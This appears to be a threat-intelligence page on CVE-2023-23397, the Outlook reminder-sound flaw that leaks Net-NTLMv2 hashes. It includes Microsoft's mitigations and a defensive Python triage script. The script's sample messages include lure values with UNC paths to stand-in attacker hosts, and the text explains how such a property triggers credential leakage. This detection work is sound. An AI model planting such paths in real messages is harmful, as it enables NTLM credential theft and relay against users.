
mommy Access Broker
mommy Access Broker is enabling access-as-a-service operations through detailed intrusion guides and compromised credentials, and Intel 471 has released reporting and Hunt Packages to support threat hunting and detection.
Microsoft Outlook for Windows is affected by CVE-2023-23397, an elevation-of-privilege vulnerability that leaks the user's Net-NTLMv2 hash to an attacker-controlled server, where it can be relayed to another service to authenticate as the victim. Although only limited attacks have been observed, the vulnerability carries a low attack-complexity rating, meaning threat actors can use it with relative ease; Microsoft disclosed that it had been exploited in the wild since April 2022. The exploit is triggered when the Outlook client retrieves and processes a malicious message, calendar invite, or task. The activity observed so far has been linked to actors working for Russian intelligence services, who used the vulnerability in targeted attacks against government, military, energy, and transportation organizations. The vulnerability has been proven exploitable only in Windows versions of Outlook, not in other versions such as Outlook for macOS. Given the ubiquity of Outlook and Microsoft Office worldwide, and the still-developing understanding of how the vulnerability is being exploited, organizations should prepare now and stay current on any updates concerning CVE-2023-23397.
Microsoft published a detailed advisory for CVE-2023-23397, a zero-day vulnerability that allows a threat actor to send a specially crafted email to a Microsoft Outlook client on Windows, which then automatically connects to a UNC location under the actor's control and sends the user's Net-NTLMv2 hash. All Microsoft Outlook products on Windows are affected; Outlook for Android, iOS, and macOS and Outlook on the web are not. Microsoft recommends patching immediately and has published mitigations for organizations that cannot: adding users to the Protected Users security group, which prevents NTLM from being used as an authentication mechanism, and blocking outbound TCP 445/SMB at the perimeter firewall, the local firewall, and in VPN settings. Microsoft has also released a script that searches Exchange messaging items (mail, calendar, and tasks) for the property used in the attack, so that organizations can check for signs of exploitation.
The vulnerability is a critical elevation-of-privilege flaw that enables NTLM credential theft. An attacker crafts an email message carrying the extended MAPI property PidLidReminderFileParameter, which specifies the path of the sound file a client should play when the reminder for that object becomes overdue. In that property the attacker places a Universal Naming Convention (UNC) path to an SMB share under their control. When the reminder fires, the vulnerable Outlook client authenticates to the share and sends the user's Net-NTLMv2 hash to the attacker, who can relay it in NTLM relay attacks against other systems or attempt to crack it offline. No user interaction is required: the connection is made when Outlook processes the reminder, before the message is opened or previewed.
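To make the hunting logic concrete, the following added example (written for this page; it is not Intel 471's Hunt Package or Microsoft's script) takes the extended MAPI properties already extracted from a message, for example by an Exchange mailbox search or an MSG parser, and flags values of PidLidReminderFileParameter that would make Outlook authenticate to a remote host. Property names follow the MS-OXORMDR specification; the sample messages, the hostnames and the internal DNS suffix .corp.example are constructed for illustration and are assumptions, not data from the page.

```python
"""Triage MAPI reminder properties for CVE-2023-23397-style UNC lures.

Added example: classify PidLidReminderFileParameter values as local files or as
UNC / URL references that make the Outlook client connect to another host.
"""
import ipaddress
import re

PID_LID_REMINDER_FILE_PARAMETER = "PidLidReminderFileParameter"
PID_LID_REMINDER_OVERRIDE = "PidLidReminderOverride"

# \\host\share\file, //host/share/file and the long form \\?\UNC\host\share\file
_UNC_RE = re.compile(r"^[\\/]{2}(?:\?[\\/]UNC[\\/])?([^\\/]+)(?:[\\/](.*))?$", re.IGNORECASE)
# URL forms (WebDAV over HTTP, smb://) also trigger an authenticated connection
_URL_RE = re.compile(r"^(?:https?|smb|file)://([^/\\]+)", re.IGNORECASE)


def _host_is_internal(host, internal_suffixes):
    """True for private/loopback/link-local IPs or names under an internal DNS suffix."""
    # Drop WebDAV port suffixes such as host@SSL@443 and IPv6 brackets.
    name = host.split("@")[0].strip("[]")
    try:
        ip = ipaddress.ip_address(name)
    except ValueError:
        lowered = name.lower()
        return any(lowered == s.lstrip(".") or lowered.endswith(s.lower())
                   for s in internal_suffixes)
    return ip.is_private or ip.is_loopback or ip.is_link_local


def classify_reminder_path(value, internal_suffixes=()):
    """Return (kind, host, internal) for one PidLidReminderFileParameter value.

    kind is 'empty', 'local', 'unc' or 'url'; host/internal are None for the
    first two because no remote connection is implied.
    """
    if not value:
        return ("empty", None, None)
    for kind, pattern in (("unc", _UNC_RE), ("url", _URL_RE)):
        m = pattern.match(value)
        if m:
            host = m.group(1)
            return (kind, host, _host_is_internal(host, internal_suffixes))
    return ("local", None, None)


def triage_message(props, internal_suffixes=()):
    """Verdict for one message: ('suspicious' | 'review' | 'benign', reason)."""
    kind, host, internal = classify_reminder_path(
        props.get(PID_LID_REMINDER_FILE_PARAMETER), internal_suffixes)
    if kind in ("empty", "local"):
        return ("benign", "reminder sound absent or a local file")
    # MS-OXORMDR: the custom sound is honoured only when PidLidReminderOverride
    # is TRUE. An exploit sets it, so record it but do not rely on it.
    override = bool(props.get(PID_LID_REMINDER_OVERRIDE, False))
    if not internal:
        return ("suspicious", f"{kind} path to external host {host} (override={override})")
    # An internal host still receives the Net-NTLMv2 hash; a compromised
    # internal box is a relay pivot, so keep it for analyst review.
    return ("review", f"{kind} path to internal host {host} (override={override})")


# Constructed sample messages (assumption: properties already decoded as strings/bools).
SAMPLE_MESSAGES = [
    {"Subject": "Quarterly review", PID_LID_REMINDER_FILE_PARAMETER: r"C:\Windows\Media\Alarm01.wav",
     PID_LID_REMINDER_OVERRIDE: True},
    {"Subject": "Invoice overdue", PID_LID_REMINDER_FILE_PARAMETER: r"\\attacker.example\share\notify.wav",
     PID_LID_REMINDER_OVERRIDE: True},
    {"Subject": "Team sync", PID_LID_REMINDER_FILE_PARAMETER: r"\\?\UNC\dav.attacker.example@80\x\ding.wav",
     PID_LID_REMINDER_OVERRIDE: True},
    {"Subject": "IT notice", PID_LID_REMINDER_FILE_PARAMETER: r"\\10.0.0.5\sounds\ding.wav",
     PID_LID_REMINDER_OVERRIDE: True},
    {"Subject": "Backup", PID_LID_REMINDER_FILE_PARAMETER: r"\\files.corp.example@SSL@443\DavWWWRoot\beep.wav",
     PID_LID_REMINDER_OVERRIDE: False},
    {"Subject": "Lunch", PID_LID_REMINDER_FILE_PARAMETER: "", PID_LID_REMINDER_OVERRIDE: False},
]


def triage_all(messages, internal_suffixes=(".corp.example",)):
    """Map each message Subject to its verdict."""
    return {m["Subject"]: triage_message(m, internal_suffixes)[0] for m in messages}


if __name__ == "__main__":
    for subject, verdict in triage_all(SAMPLE_MESSAGES).items():
        print(f"{verdict:10s} {subject}")
```

Anything that comes back as "suspicious" is a candidate for the Exchange-side clean-up Microsoft's script performs (clearing the property or deleting the item), while "review" items deserve a look at which internal host is named and whether that host is expected to serve reminder sounds at all.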